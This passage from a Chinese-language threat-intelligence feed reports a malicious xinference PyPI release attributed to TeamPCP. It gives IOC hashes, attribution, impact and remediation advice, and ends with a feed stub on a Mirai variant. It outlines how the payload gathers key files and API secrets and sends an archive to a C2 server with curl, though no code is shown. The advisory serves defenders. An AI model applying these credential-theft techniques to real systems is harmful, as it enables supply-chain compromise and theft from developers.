5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">.pem</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">, </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">.key</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">）。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">Slack/Discord webhook，JSON/配置文件中的 API 密钥。</span></p></li></ul><p><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf=""><span textstyle="" style="font-weight: normal;">3.</span>数据外泄<span textstyle="" style="font-weight: normal;">：所有收集的数据写入标准输出 → 压缩为 </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">love.tar.gz</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;"> → 通过带有自定义头部 </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">X-QT-SR: 14</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;"> 的 </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">curl --data-binary</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;"> 发送到 C2。</span></span></strong></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">哈希值（来源于 JFrog）：</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">恶意 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">__init__.py</span></code><span leaf="">: </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">SHA-256 e1e007ce4eab7774785617179d1c01a9381ae83abfd431aae8dba6f82d3ac127</span></code></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">解码后的第一阶段负载: </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">077d49fa708f498969d7cdffe701eb64675baaa4968ded9bd97a4936dd56c21c</span></code></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">解码后的第二阶段负载: </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">fe17e2ea4012d07d90ecb7793c1b0593a6138d25a9393192263e751660ec3cd0</span></code></p></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">与此前 TeamPCP 的一些样本不同，该样本没有持久化机制。其重点是快速、一次性地窃取数据。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">归因与更广泛背景</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">TeamPCP 特征<span textstyle="" style="font-weight: normal;">：包含明确的“# hacked by teampcp”标记，使用了类似的 base64 + subprocess 技术，以及在 2026 年早期攻击中见过的 C2 外泄模式（如 </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">litellm 1.82.7/1.82.8</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;"> 和 </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">telnyx 4.87.1/4.87.2</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">）。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">否认声明<span textstyle="" style="font-weight: normal;">：TeamPCP 的 X 账号 (@pcpcats) 明确否认负有责任，称其为模仿者并表示愿意调查。JFrog 已更新其博客以记录此声明。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">可能路径<span textstyle="" style="font-weight: normal;">：极有可能是 </span></span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf=""><span textstyle="" style="font-weight: normal;">PyPI 账号被盗</span></span></strong><span leaf=""><span textstyle="" style="font-weight: normal;"> (XprobeBot)，而非 GitHub 被攻破。这与 TeamPCP 使用窃取的 CI/CD 或维护者凭据的历史一致。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">活动背景<span textstyle="" style="font-weight: normal;">：这是 2026 年针对开发工具、AI 代理和基础设施 SDK 的供应链攻击浪潮的一部分。之前的事件也涉及类似的凭据窃取，目标是高权限环境。</span></span></strong></li></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">影响</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">规模<span textstyle="" style="font-weight: normal;">：虽然三个恶意版本在线时间较短，但该包总体下载量巨大。在受影响窗口期内自动更新或全新安装的任何 CI/CD 流水线、AI 推理服务器或开发机都处于风险之中。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">目标画像<span textstyle="" style="font-weight: normal;">：运行自托管推理的 AI/ML 团队（这些环境通常持有高价值云凭据、K8s 令牌和模型服务环境）。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">潜在损害<span textstyle="" style="font-weight: normal;">：完全的凭据泄露可能导致横向移动、数据外泄、加密货币被盗或勒索软件攻击。AWS 特有的逻辑显示了针对性的后期利用意图。</span></span></strong></li></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">维护者与社区响应</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">维护者 (Qin Xuye / XorbitsAI)<span textstyle="" style="font-weight: normal;">：在 GitHub 收到 issue 报告后迅速撤回了相关版本。目前 GitHub 仓库尚未发布置顶的公开声明，但暗示已进行内部调查。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">JFrog 安全研究<span textstyle="" style="font-weight: normal;">：当日发布了全面的技术分析，并将其加入 Xray (XRAY-96896)。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">OX Security<span textstyle="" style="font-weight: normal;">：独立确认了此事，强调了机器人账号被盗的问题，并提供了修复建议。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">PyPI<span textstyle="" style="font-weight: normal;">：已移除相关版本；并提供了恶意软件举报链接。</span></span></strong></li></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">修复与建议</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">如果您可能受到影响（根据 JFrog/OX 的建议）：</span></strong></p><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">立即隔离<span textstyle="" style="font-weight: normal;">受影响的主机。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">轮换所有凭据<span textstyle="" style="font-weight: normal;">：SSH 密钥、所有云平台 IAM 凭据 (AWS/GCP/Azure)、K8s 令牌、Docker/PyPI/npm 令牌、数据库密码、.env机密、钱包、TLS 密钥等。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">审计<span textstyle="" style="font-weight: normal;">：CloudTrail、K8s 日志、Shell 历史、认证日志、Git 活动。封禁 C2 域名。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">降级<span textstyle="" style="font-weight: normal;">：运行 </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">pip install &#34;xinference&lt;=2.5.0&#34;</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;">，并在 </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">requirements.txt</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;"> 或 </span></span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf=""><span textstyle="" style="font-weight: normal;">pyproject.toml</span></span></code><span leaf=""><span textstyle="" style="font-weight: normal;"> 中</span></span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf=""><span textstyle="" style="font-weight: normal;">锁定</span></span></strong><span leaf=""><span textstyle="" style="font-weight: normal;">版本。</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">长期防护<span textstyle="" style="font-weight: normal;">：</span></span></strong></li></ol><ul style="list-style-type: circle;" class="list-paddingleft-1"><ul style="list-style-type:disc;font-size:16px;" class="list-paddingleft-1"><li><p><span leaf=""><span textstyle="" style="font-size: 16px;">在 PyPI、GitHub 和所有维护者账号上启用双重认证 (2FA/MFA)。</span></span></p></li></ul><ul style="list-style-type:disc;font-size:16px;" class="list-paddingleft-1"><li><p><span leaf=""><span textstyle="" style="font-size: 16px;">使用依赖锁定和 SBOM 工具（如 JFrog Xray，具有漏洞扫描功能的 Dependabot）。</span></span></p></li></ul><ul style="list-style-type:disc;font-size:16px;" class="list-paddingleft-1"><li><p><span leaf=""><span textstyle="" style="font-size: 16px;">使用能检测这些 IOC（失陷指标）的工具扫描环境。</span></span></p></li></ul><ul style="list-style-type:disc;font-size:16px;" class="list-paddingleft-1"><li><p><span leaf=""><span textstyle="" style="font-size: 16px;">在 CI/CD 中优先使用锁定的、经过验证的包源或镜像。</span></span></p></li></ul></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">针对 PyPI 普通用户的建议</span></strong><span leaf="">：此次事件（以及之前的“Revival Hijack”技术）凸显了已删除/重新注册软件包及维护者账号被盗的风险。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这是一个快速演变的事件。请关注官方 GitHub 仓库 (xorbitsai/inference) 和 PyPI 以获取维护者的进一步更新。组织机构应将此视为 AI 工具供应链安全的警钟。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">资料来源</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf=""><a href="https://research.jfrog.com/post/xinference-compromise/" target="_blank">https://research.jfrog.com/post/xinference-compromise/</a></span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf=""><a href="https://www.ox.security/blog/xinference-allegedly-hacked-by-teampcp-malicious-package-in-pypi/" target="_blank">https://www.ox.security/blog/xinference-allegedly-hacked-by-teampcp-malicious-package-in-pypi/</a></span></p><div style="font-size: 15px;letter-spacing: 1px;line-height: 1.75;padding-left: 0px;padding-right: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="will-change: transform;box-sizing: border-box;"><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="gif" data-w="480" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034857" src="https://wechat2rss.xlab.app/img-proxy/?k=443faa4f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqibOb9TQJgj511D6OictCgqTw8GV1BfelVgiaMWbfczWRj8ic7UAdVqKYsLMDE6XJ3u5Bn70wPdOE0Ybkjoc7Pq7oC9lhjBQibT9qNU%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.1</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div></div></li></ul><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=e37818d7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518509%26idx%3D1%26sn%3Dbef0b7230e3d69d03629a6f6c6ee60bb">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 23 Apr 2026 10:29:00 +0800</pubDate>
    </item>
    <item>
      <title>Mirai变种Nexcorium深度解析：针对视频监控设备的命令注入漏洞利用与僵尸网络演化分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518497&amp;idx=1&amp;sn=6c8168f317a01d94b67558c6c18cbd5a</link>
      <description>奇安信威胁情报中心监测发现，Fortinet FortiGuard Labs与Palo Alto Networks Unit 42联合披露了一起活跃的物联网僵尸网络攻击活动。攻击者利用TBK数字视频录像机（DVR）设备中的命令注入漏洞，部署名为Nexcorium的新型Mirai僵尸网络变种。</description>
